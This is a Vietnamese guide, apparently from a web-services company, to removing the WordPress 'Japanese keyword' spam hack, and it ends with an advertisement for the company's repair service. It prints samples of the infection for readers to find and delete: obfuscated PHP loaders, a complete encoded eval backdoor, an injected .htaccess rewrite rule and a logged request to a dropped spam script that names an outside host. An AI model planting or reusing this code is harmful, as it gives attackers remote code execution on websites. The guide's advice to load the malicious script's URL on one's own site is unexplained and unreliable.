Cách fix lỗi site bị nhiễm mã độc và index tiếng Nhật

Hướng dẫn chi tiết cách fix lỗi site bị nhiễm mã độc và index tiếng Nhật. Các bạn phải tốn rất nhiều thời gian và công sức để SEO các từ khóa lên Top. Tuy nhiên, khi các website khi không may bị dính mã độc sẽ khiến công sức các bạn gây dựng bao lâu có thể tan thành mây khói chỉ trong vài ngày.

Các website dùng WordPress thường là đối tượng bị dính mã độc khá nặng, khiến cho website tự động index link tiếng Nhật lên kết quả tìm kiếm Google, điển hình như sau:

1. Kiểm tra quyền truy cập WMT Webmaster Tool

Website bị nhiễm mã độc và index link tiếng Nhật sử dụng liên kết đến các cửa hàng bán hàng giả mạo và sau đó được hiển thị trong tìm kiếm của Google (Có thể kiểm tra những đường link này theo dạng site:domain). Với loại hack này, hacker thường sẽ tự thêm mình làm chủ sở hữu tài sản trong Google Webmaster Tool (WMT). Vì thế, bước đầu tiên bạn phải xóa quyền sở hữu của tài khoản lạ trong WMT

– Vào đường link sau https://www.google.com/webmasters/verification

– Vào “Chi tiết xác minh” để xem cách “tài khoản lạ” xác minh sở hữu website.

– Sau đó, vào CMS để xóa quyền sở hữu website này. (Trước khi bắt đầu, tạo một bản sao của bất kỳ tệp nào trước khi bạn xóa chúng, trong trường hợp bạn cần khôi phục chúng sau)
+ Mã thông báo xác minh cần xóa thường là tệp HTML trên thư mục gốc của trang web trên CMS.
+ Bạn thường có thể kiểm tra xem đã xoá thành công mã thông báo xác minh được tạo ra bằng cách điều hướng đến tệp token xác minh mô phỏng như thế nào www.example.com/google[random number and letters].html

Ví dụ: Website của các bạn có một mã xác minh: google-site-verification: google0003f30bc19bd379.html. Trên thanh URL gõ đường dẫn Domain/google0003f30bc19bd379.html. Nếu kết quả là 404 thì các bạn đã xóa thành công tài khoản này.

– Đi kèm với xác minh chủ sở hữu bằng tệp token, hacker cũng chèn vào một file Sitemap chứa các link độc hại để website index các link này nhanh hơn. Các bạn cũng cần xóa file này đi.

2. Download Plugin Wordfence Security về để quét toàn bộ site

Đây là cách rất nhanh để xác định các tập tin được hacker rải mã độc vào CMS. Đây là một plug-in về bảo mật miễn phí của WordPress . Sử dụng chức năng “scan” để quét các file. Sau đấy các bạn dựa vào đó để sửa từng thư mục. Update các theme, phiên bản WordPress .

Các khối mã cần xóa:

Quét qua các tệp tin đáng ngờ mà các bạn đã xác định để tìm các khối mã obfuscated. Mã obfuscated như một sự kết hợp của các chữ cái và chữ số sắp xếp lộn xộn thường được đặt trước bởi sự kết hợp của các hàm PHP như:

base64_decode, rot13, eval, strrev, gzinflate

Một số cấu trúc các bạn xóa:

@set_time_limit(3600);
@ignore_user_abort(1);
$xmlname = ‘mapss259.xml’;
$jdir = ”;
$smuri_tmp = smrequest_uri();
if($smuri_tmp==”){
$smuri_tmp=’/’;
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER[‘REQUEST_URI’])){
$smuri = $_SERVER[‘REQUEST_URI’];
}else{
if(isset($_SERVER[‘argv’])){
$smuri = $_SERVER[‘PHP_SELF’] . ‘?’ . $_SERVER[‘argv’][0];
}else{
$smuri = $_SERVER[‘PHP_SELF’] . ‘?’ . $_SERVER[‘QUERY_STRING’];
}
}
return $smuri;
}
$O00OO0=urldecode(“%6E1%7A%62%2F%6D%615%5….”);$O00O0O=$O00OO0{3}.$O00OO0{6}.$O….
?>
/**
* @package wordpresss
* @subpackage Template.system
*
* @copyright Copyright (C) 2005 – 2017 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
$p = getcwd();
echo $p;
?>
$uf=”aXRvbmd0b”;
$ka=”ZXZhbCgkX1″;
$pjt=”JFUVVFU1Rb”;
$vbl = str_replace(“ti”,””,”tistittirti_rtietipltiatice”);
$iqw=”25nXSk7″;
$bkf = $vbl(“k”, “”, “kbakske6k4k_kdkekckokdke”);
$sbp = $vbl(“ctw”,””,”ctwcctwrectwatctwectw_fctwuncctwtctwioctwn”);
$mpy = $sbp(”, $bkf($vbl(“W”, “”, $ka.$pjt.$uf.$iqw))); $mpy();
?>

Decode đoạn trên ra kết quả . Các bạn sẽ tìm thấy request này ở file error_log

Một số dòng có ở đầu file có dạng :

Các bạn có thể so sánh file bị thay đổi so với mã nguồn WordPress : https://github.com/WordPress/WordPress nếu không biết cần phải xóa những đọan nào.

3. Kiểm tra tập tin .htaccess của các bạn

– Tìm kiếm vị trí các file .htaccess. Keyword “.htaccess file location” + tên CMS (WordPress, Joomla, …)
– Tìm kiếm file .htaccess mặc định. Keyword “default .htaccess file” + tên CMS (WordPress, Joomla, …), thay thế vào các file đã có.

Lưu ý: .htaccess thường là một “tập tin ẩn”. Hãy cho phép hiển thị tất cả các tập tin ẩn khi các bạn đang tìm kiếm vị trí những file đó

4. Sau khi xóa sạch mã độc, index nhanh lại các link bị mất

Sử dụng công cụ “Tìm nạp như Google” trên WMT để index lại trang chủ SAU KHI XÓA SẠCH MÃ ĐỘC
Vào phần “Lỗi thu thập dữ liệu” trên WMT để xóa các link 404

Cách kiểm tra website đã fix xong chưa:

Do cache nên sau khi fix sẽ phải chờ 1 khoảng time dài để biết website đã fix hết link tiếng Nhật chưa. Có thể kiểm tra nhanh bằng các cách sau:
– Thứ hạng từ khóa trở lại
– Gõ tìm kiếm sau: “site:domain japan”

5. Vấn đề với tập tin index.php

Có một việc mất khá nhiều thời gian của các bạn là mã độc ở tập tin index.php. Mỗi khi các bạn xóa, đến hôm sau lại xuất hiện mã độc tại file này.

@set_time_limit(3600);
@ignore_user_abort(1);
$xmlname = ‘mapss259.xml’;
$jdir = ”;
$smuri_tmp = smrequest_uri();
if($smuri_tmp==”){
$smuri_tmp=’/’;
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER[‘REQUEST_URI’])){
$smuri = $_SERVER[‘REQUEST_URI’];
}else{
if(isset($_SERVER[‘argv’])){
$smuri = $_SERVER[‘PHP_SELF’] . ‘?’ . $_SERVER[‘argv’][0];
}else{
$smuri = $_SERVER[‘PHP_SELF’] . ‘?’ . $_SERVER[‘QUERY_STRING’];
}
}
return $smuri;
}

$O00OO0=urldecode(“%6E1%7A%62…”);$O00O0O=$O00OO0{3}…;eval($O00O0O(“JE8wTzAwMD0….
?>

Tệp đáng ngờ là tên tệp “db_lookups.php” trong thư mục public_html\wp-content\themes\twentyfourteen. Sau đó, các bạn tìm trong mã nguồn WordPress thì “Không có tập tin nào tên là db_lookups.php”

Ngoài ra còn có tập tin “comay.php” trong thư mục public_html\wp-content\themes\twentyfourteen. Cũng không có trong mã nguồn WordPress và cần xóa. Tập tin này tự động sinh ra các link khiến cho lượng index website tăng lên hàng nghìn, hàng trăm nghìn link

$code=’bas’.’e64_d’.’eco’.’de’;
$yzcW=gzinflate($code($yzcW));
for($i=0;$i<>
{
$yzcW[$i] = chr(ord($yzcW[$i])-1);
}
return $yzcW;
}eval(OLsy(”
7b37e1zHcSD6O/R9+h+ao7HOjDiYBwi+AA4IEA8SEgh…));?>

Tiếp theo, kiểm tra trong file .htaccess

# BEGIN WordPress

RewriteEngine On
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).xhtml$ index.php?tempweb=$1&smid=$2 [L] RewriteBase /
RewriteRule ^index\.php$ – [L] RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

Trong tập mặc định file .htaccess không có dòng này:

RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).xhtml$ index.php?tempweb=$1&smid=$2 [L]

Sau đó, các bạn kiểm tra file access_log trong thư mục logs/access_log tìm thấy 1 request đến file db_lookups.php

[21/Aug/2017:10:47:40 +1000] “GET /wp-content/themes/twentyfourteen/db_lookups.php?u=i&m=UJSLJ7JVSK9U&web=chargespeed.pw&k=r HTTP/1.1” 200 171 “-” “Googlebot”

Các bạn xóa mã được chèn vào index.php và nhập vào đường dẫn sau:

Domain/wp-content/themes/twentyfourteen/db_lookups.php?u=i&m=UJSLJ7JVSK9U&web=chargespeed.pw&k=r

Sau đó kiểm tra tập tin index.php xem có mã độc trở lại không.

Trên đây là các bước để xử lý khi website của các bạn dính phải bị nhiễm mã độc và index tiếng Nhật. Nếu các bạn không phải là kỹ thuật và cảm thấy khó khăn trong việc này, hoặc các bạn chưa có kinh nghiệm xử lý (vì để càng lâu mức độ càng nguy hiểm, có thể mất hết thứ hạng từ khóa) thì có thể liên hệ với chúng tôi để giải quyết nhanh hơn.

Chúng tôi sẽ nhanh chóng khắc phục kịp thời fix lỗi nhiễm mã độc cho website của các bạn!

Dịch vụ fix lỗi nhanh chóng – Đảm bảo uy tín!

Xem thêm: Hướng dẫn khắc phục lỗi Website wordpress tự động bị chèn link, tiếng Trung tiếng Nhật

=========================

Mọi chi tiết xin liên hệ

Công ty TNHH Phần mềm OneDay

  Địa chỉ: Phòng 602, Chung cư Sống Hoàng, Mai Động, Hoàng Mai, Hà Nội

  Phone: 0936.458.438 – 0986.496.984

  Email: contact@oneday.vn

  Website: www.oneday.vn

  Zalo: 0936.458.438